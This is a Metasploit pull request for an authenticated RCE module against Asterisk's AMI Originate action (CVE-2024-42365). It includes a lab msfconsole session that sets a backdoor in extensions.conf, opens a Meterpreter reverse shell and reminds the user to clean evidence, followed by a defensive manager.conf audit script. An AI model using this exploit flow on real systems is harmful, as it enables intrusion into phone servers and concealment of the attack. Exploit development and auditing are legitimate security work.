rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Asterisk authenticated rce via AMI (CVE-2024-42365) #19613

Open h00die opened 3 weeks ago

h00die commented 3 weeks ago

Fixes #19388

Authenticated RCE for Asterisk via AMI for users with originate access, CVE-2024-42365. Hats off to @bcoles for writing a bunch of the underlying functionality which I'm going to move into a lib. Exploit works with certain payloads, needs a cleanup and some more robustness.

h00die commented 2 weeks ago

Everything else should be addressed!

h00die commented 3 hours ago

Just tested w/ all changes, still working just fine :)

jheysel-r7 commented 5 minutes ago

Thanks for making those changes! I also just retested and everything was working perfectly :) Landing now

msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set rhost 192.168.123.243
rhost => 192.168.123.243
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set username testuser
username => testuser
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set password testuser
password => testuser
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.243:5038 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[+] 192.168.123.243:5038 - Authenticated successfully
[!] 192.168.123.243:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Using new context name: MiCAmsEvkFU
[*] 192.168.123.243:5038 - Loading conf file
[*] 192.168.123.243:5038 - Setting backdoor
[*] 192.168.123.243:5038 - Reloading config
[*] 192.168.123.243:5038 - Triggering shellcode
[*] Sending stage (24772 bytes) to 192.168.123.243
[+] 192.168.123.243:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.243:49454) at 2024-11-29 09:19:54 -0800

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer        : freepbx.sangoma.local
OS              : Linux 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
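
On the defensive side, the precondition named in the PR description (an AMI user with originate access) can be audited in `manager.conf`. The script below is an added example, not code from this PR or from Metasploit; the sample config, the function names and the three checks are assumptions chosen for illustration.

```python
import re

# Constructed sample manager.conf, not taken from the host in the session above.
SAMPLE_MANAGER_CONF = """\
[general]
bindaddr = 0.0.0.0
[testuser]
secret = testuser
write = system,call,originate   ; may send the Originate action
[monitor]
permit = 127.0.0.1/255.255.255.255
write = call
[admin]
secret = An0ther-Long-Random-Value
permit = 10.0.0.5/255.255.255.255
write = all
"""

SECTION = re.compile(r"^\[([^\]]+)\]")

def parse_manager_conf(text):
    """Return {section: {key: [values]}}; keys such as permit/deny may repeat."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a comment (escapes ignored)
        m = SECTION.match(line)
        if m:
            current = sections.setdefault(m.group(1).strip(), {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)  # also accepts 'key => value'
            current.setdefault(key.strip().lower(), []).append(value.lstrip(">").strip())
    return sections

def audit_originate(text):
    """Report AMI users whose write classes include originate (or all)."""
    findings = []
    for user, opts in parse_manager_conf(text).items():
        classes = {c.strip().lower() for v in opts.get("write", []) for c in v.split(",")}
        if user.lower() == "general" or not classes & {"originate", "all"}:
            continue
        checks = [("write grants originate", True),
                  ("no permit ACL", not opts.get("permit")),
                  ("secret equals username", user in opts.get("secret", []))]
        findings.append((user, [name for name, hit in checks if hit]))
    return findings

if __name__ == "__main__":
    for user, issues in audit_originate(SAMPLE_MANAGER_CONF):
        print(f"{user}: {', '.join(issues)}")
```

Point it at the real file by passing the contents of `/etc/asterisk/manager.conf` to `audit_originate`; included files and section templates are not followed.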